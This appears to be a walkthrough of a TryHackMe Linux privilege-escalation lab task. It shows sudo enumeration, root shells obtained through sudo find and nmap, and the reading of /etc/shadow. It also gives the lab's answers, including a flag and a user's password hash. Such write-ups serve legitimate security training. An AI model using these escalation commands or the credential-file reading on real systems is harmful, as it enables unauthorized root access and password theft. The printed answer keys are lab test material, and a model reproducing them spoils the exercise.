Tryhackme: Linux Privilege Escalation

3 min readMar 13, 2023

Task 6

As mentioned in the task writeup, we can use the following command to see what our user has rights to sudo as:

sudo -l

ANSWER: 3

We know we can run find as sudo, so this means we can theoretically search the whole file system for this file.

So we’ll use the find command for this:

find / -type f -name 'flag2.txt'

Success — it’s in /home/ubuntu.

Next we can use the cat command to read it:

cat /home/ubuntu/flag2.txt

Answer: THM-402028394

You’ll note that if you run the above find command without sudo it fails to find the file.

So we needed sudo to be able to use find.

But we could have manually found the file, it would have just taken a while.

Again we go back to the previous linked website and find NMAP:

If we scroll down we’ll see a section called Sudo.

Well we just got root, so we know it can run as sudo and the command is right there:

Answer: sudo nmap — interactive

Remember those three are commands earlier when we ran sudo -l?

If we look at this website (which is also mentioned earlier in the task writeup):

We can see that there’s a page for find.

There’s a command in here we can use to get root:

sudo find . -exec /bin/sh \; -quit

This is root for everything, not just sudo for the Karen account.

From earlier exercises we know that the password hashes are stored here:

/etc/shadow/

As we have root now, we can easily look at those using cat:

cat /etc/shadow

This will give us a list of the hashes, where we can see Franks:

frank:$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:7:::

We then need to just clean it up for the THM website:

Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1